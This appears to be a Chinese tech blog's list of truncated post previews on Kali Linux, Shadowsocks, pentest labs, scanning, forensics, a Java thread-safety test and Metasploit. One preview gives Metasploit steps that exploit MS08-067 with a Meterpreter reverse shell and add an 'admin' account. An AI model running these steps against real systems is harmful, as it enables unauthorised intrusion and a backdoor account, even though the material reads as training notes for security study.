1、安装软件Debian/Ubuntu:apt-get install python-pip pip install shadowsocks CentOS:yum install python-setuptools && easy_install pip pip install shadowsocks 2、配置(创建配置)cat <<EOF > /etc/shadowsocks.json { "server":"ss服务器IP", "server_port":ss服务器端口, "local_address":"127.0.0.1", "local_port":1080, # 你的本地端口 "password":"ss服务器密码", "timeout":300, # 超时时间 "method:":"aes-256...
Kali Linux 工具清单Information Gatheringacccheck ace-voip Amap Automater bing-ip2hosts braaCaseFile CDPSnarf cisco-torch Cookie Cadger copy-router-config DMitrydnmap dnsenum dnsmap DNSRecon dnstracer dnswalkDotDotPwn enum4linux enumIAX Fierce Firewalk fragroutefragrouter Ghost Phisher GoLismero goofile hping3 InTraceiSMTP lbd Maltego Teeth masscan Metagoofil Mirandanbtscan-unixwiz Nmap ntop p0f Pa...
本地shentou测试环境 在学习网络安全中,常常没有真实实验环境帮助自己动手提升技术能力,而本地shentou测试环境就为大家带来了便利。本地shentou测试环境:搭建于本地来进行shentou测试的环境,通常是以网站,系统环境来做shentou测试。DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序,包含了SQL注入、XSS、远程命令执行等常见的一些安全漏洞。 搭建 下载dvwagi...
编辑sources.list文件 leafpad /etc/apt/sources.list#aliyun 阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib# ustc 中科大 # deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib # deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib # deb http://mirrors.ustc.ed...
我们如何将域名解析成一个IP地址? nslookupserver显示的是我当前服务器的地址。 但是我们并没有解析到具体的ip地址,而是把我们输入的域名解析成另一个域名,说明我们输入的域名不是一个a记录,是一个cname记录。我们需要在解析,经过不断的解析我们最终得到了ip:其实我们在第一次解析就已经得到了最终的ip地址。
import org.junit.Test; import java.text.SimpleDateFormat; import java.time.LocalDateTime; import java.time.format.DateTimeFormatter; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; /** * 验证 SimpleDateFormat 是线程不安全的 */ public class DateFormat { /** * 只创建一份,避免频繁地创建对象和销毁对象 * 单线程下可以不出错 * 多线程下则不安全, 不...
首先你要知道kalilinux默认不允许root用户远程登录,因此需要修改以下文件来达到目的: 如果你没有修改文件则会一直是这种情况:正题: 1.输入: 2.找到这一部分: 3.修改为并保存(:wq!): 4.重启ssh
转自 https://www.linuxidc.com/Linux/2018-08/153429.htm 一.镜像下载: 根据需求下载自己需要的版本 从官网下载kali 2018.2 的安装包:https://www.kali.org/downloads/ 二.烧录: 这里推荐用 win32 disk imager 尝试了好几款烧录工具,这个是相对最稳定的 打开win32后第一步 选中镜像位置 ,第二步 选择要烧录的U盘的盘符 比如U盘是E盘,就选E ,第三步 点击写入 过程可能有两三分钟 烧录完成之后 把U盘拔出 三.安装: 在这里说一下 ...
好久不见了各位朋友,昨天在kali下倒腾东西的时候发现,我下了第三方框架fastadmin框架并安装时遇到的一些问题,然后整理下过程。下面我们开始今天的正题。 首先先看下我们的环境,如下图所示: 然后我们看着官方文档一步步来执行。这里是官方文档链接 https://doc.fastadmin.net/docs/install.html 下面的截图是官网文档中提交的环境要求: 这里我们使用命令行安装因为是Linux系统嘛,执行的命令如下图官方文档所示:第一步你...
服务扫描: 不能简单的通过端口号来识别服务,目标系统开放80端口不一定开放着http服务,要通过对目标系统进行服务扫描,来识别开放的端口后面到底是什么服务,运行什么样的应用;1. 服务扫描——Banner(简单但不准确) 通过连接服务器的端口,使其返回的banner信息,可能查不到,也可能是管理员伪造的; 通过软件开发商,软件名称,服务类型,版本号(直接发现已知的漏洞和弱点); 对于Banner信息的捕获,需要建立完整的TCP连接;...
第一季-------------------- 启动Metasploit:msfconsole 升级和更新:./msfupdate 直接退出:exit 退回上一级:quit 1.端口扫描: a.调用Nmap扫描 nmap -v -sV ip b.调用msf模块扫描(1) use auxiliary/scanner/portscan/syn show options set INTERFACE 网卡 set PORTS 端口 set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用) set THREADS 100 run 2.SMB扫...
---------------第二季-------------- 1.远程代码执行 msfconsole search 08-067 use exploit/windows/smb/ms08_067_netapi show options set RHOST IP show payloads set payload windows/meterpreter/reverse_tcp show options set LHOST ip info(查看影响版本) 用nmap查看目标服务器版本 set target 编号 show options(检查是否已经设置好) exploit shell net user admin admin /add 2.MJDJ文件解析远程代码执...
Kali Linux安装字典StarDictStartDict是国外知名的字典框架,也可以加入国内翻译工具的字典。Kali Linux软件源提供该字典框架。用户需要安装qstardict软件包和词库包stardict-czech、stardict-english、stardict-german-czech、stardict-xmlittre。将其他翻译工具的词库文件(.dict.dz,.dix,.ifo.syn)复制到/usr/share/stardict/dic目录下,就可以用了。
取证简介: CSI:物理取证 指纹、DNA、弹道、血迹 无力取证的理论基础是物质交换原则 数字取证/计算机取证 智能设备、计算机、手机平板、loT、有线及无线信道、数据存储 事件响应调查------黑客攻击,渗透测试留痕 通用原则----(取证分析全部过程记录文档) 维护证据完整性 数字取证比物理取证幸运的多,可以有无限数量的拷贝进行分析 数字HASH值验证数据完整性 维护监管链 物理证物保存在证物袋中,每...
高级,动态,可扩展的payload 基于meterpreter上下文利用更多漏洞发起攻击,后渗透阶段一站式操作界面 完全基于内存的dll注入式payload(不写硬盘) 注入合法系统进程并建立stager 基于stager上传和预加载dll进行扩展模块的注入(客户端api) 基于stager建立的socket连接建立加密的TLS/1.0通信隧道 利用TLS隧道进一步加载后续扩展模块(避免网络取证) 服务端使用C语言编写 客户端提供基于ruby的全特性api(支...